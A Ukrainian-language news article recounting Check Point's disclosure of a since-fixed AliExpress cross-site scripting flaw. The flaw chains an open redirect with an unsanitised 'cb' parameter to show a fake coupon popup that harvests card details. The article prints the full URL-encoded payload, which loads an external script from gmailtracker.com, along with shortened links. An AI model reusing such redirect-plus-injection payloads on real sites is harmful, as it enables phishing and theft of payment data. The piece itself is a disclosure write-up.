На AliExpress знайдена вразливість, яка дозволяє впроваджувати шкідливий код


Дізнайтесь більше про нові кар'єрні можливості в EchoUA. Цікаві проекти, ринкова оплата, гарний колектив. Надсилайте резюме та приєднуйтеся до нас.

Проблема офіційного сайту AliExpress була виявлена ще 9 жовтня 2017 року, а усунена вже 11 жовтня. Про це заявили експерти Check Point, перші, хто повідомили про знайдену діру в системі безпеки.

Уразливість дозволяла зловмисникам надсилати відвідувачам сайту посилання на сторінки AliExpress, у яких вже містився шкідливий JavaScript-код. При переході на заражену сторінку код виконувався у браузері, обходячи захист AliExpress від XSS-атак через наявність open redirect уразливості сайту.

Система купонів

AliExpress використовує систему купонів, щоб залучити нових клієнтів для покупок у магазині. Дуже часто при відвідуванні сайту Ви можете побачити спливаюче вікно, що пропонує ввести дані кредитної карти для подальшої оплати замовлень. Це, на думку AliExpress, зробить роботу з ресурсом зручнішою, оскільки не буде потреби у постійному введенні даних, що також дозволить виграти купон на купівлю.

Якщо зловмисник знайде спосіб зробити ін’єкцію вірусу, він зможе обійти логіку роботи системи безпеки сайту і створити пейлоад, який набуде такого вигляду:

Атака може розпочатися з розсилки фішингових листів, що містять шкідливе посилання. Після переходу за цим посиланням клієнт перенаправляється на сторінку входу aliexpress.com. Потім після цілком звичайного процесу реєстрації відображається спливаюче фішингове вікно з купоном, запущене на піддомені AliExpress. Введені банківські дані для отримання купона вирушають прямо до хакерів.

Виявлення вразливості

AliExpress складається з безлічі веб-сайтів і піддоменів, що працюють у групі AliBaba. Експертами було встановлено, що us.cobra.aliexpress.com некоректно працює з параметром cb. Саме маніпуляції з цим параметром могли дозволити зловмисникам виконувати довільний JS-код на піддомені AliExpress.

Відправка ж шкідливого купона безпосередньо жертві не давала ніякого ефекту, оскільки сайт AliExpress має захист від межсайтового скриптинга.

Вона базується на перевірці заголовка референта (referrer header), і, якщо він не заданий або заданий неправильно, то сервер відхиляє запит на його обробку.

Що таке референт і його заголовок?

Референт є звичайним HTTP-заголовком, що визначає URL сторінки, за якою здійснений перехід. Наприклад, при ручному наборі URL blog.checkpoint.com у рядку пошуку і подальшому переході на вказаний сайт заголовок референта буде порожнім, оскільки сторінка відкрита вперше:

GET /2017/03/15/check - point - discloses - vulnerability - whatsapp - telegram/ HTTP/1.1Host: blog.checkpoint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

При подальшому відкритті посилання на YouTube з цієї сторінки браузер автоматично додає заголовок референта, який повідомить сторінку, яка відкривається, що перехід на неї здійснений саме з blog.checkpoint.com:

GET /UR_i5XSAKrg HTTP/1.1Host: youtu.beUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0Referer: https://blog.checkpoint.com/2017/03/15/check-point-discloses-vulnerability-whatsapp-telegram/

Важливо відмітити, що референт встановлюється на кожен запитуваний ресурс, такий як JS, CSS, різні зображення і так далі. Таким чином, якщо зловмисник сам відправить шкідливе посилання жертві, то це не матиме жодного ефекту. Щоб обійти цей захист, експертам довелося використати простий прийом.

Обхід захисту

Вони вивчили зовнішній вигляд посилань AliExpress, які використовуються для редиректа на інше посилання. Саме її програмісти і змогли підмінити для ін’єкції вірусу.

https://login.aliexpress.com/havana_login_check.htm?
site=4&loginurl=https://us.cobra.aliexpress.com/p4pforlist.html?pid=801_0000_0107%26cb=3D%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E&params=https://us.cobra.aliexpress.com/p4pforlist.html?pid=801_0000_0107%26cb=%253Cscript%2Btype%253D%2527text%252Fjavascript%2527%2Bsrc%253D%2522https%253A%252F%252Fgmailtracker.com%252Fpoc.js%2522%253E%253C%252Fscript%253E

Наступним кроком стало створення коротшої версії для цього величезного шкідливого посилання. Для цієї мети підходили сервіси створення коротких посилань.

  • http://bit.ly/2kyWVe1
  • https://goo.gl/jL7vd1
  • http://bit.do/AliExpress_Coupon

Посилання “для краси” можна було упакувати в QR-код:

Перехід за цим посиланням спрямує користувача на сторінку входу AliExpress, куди буде впроваджений JS-код, що відображає фальшиве спливаюче вікно з купоном. Усі введені дані перейдуть безпосередньо до зловмисників.

Джерело: Check Point Research

Київ, Харків, Одеса, Дніпро, Запоріжжя, Кривий Ріг, Вінниця, Херсон, Черкаси, Житомир, Хмельницький, Чернівці, Рівне, Івано-Франківськ, Кременчук, Тернопіль, Луцьк, Ужгород, Кам'янець-Подільський, Стрий - за статистикою саме з цих міст програмісти найбільше переїжджають працювати до Львова. А Ви розглядаєте relocate?


Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *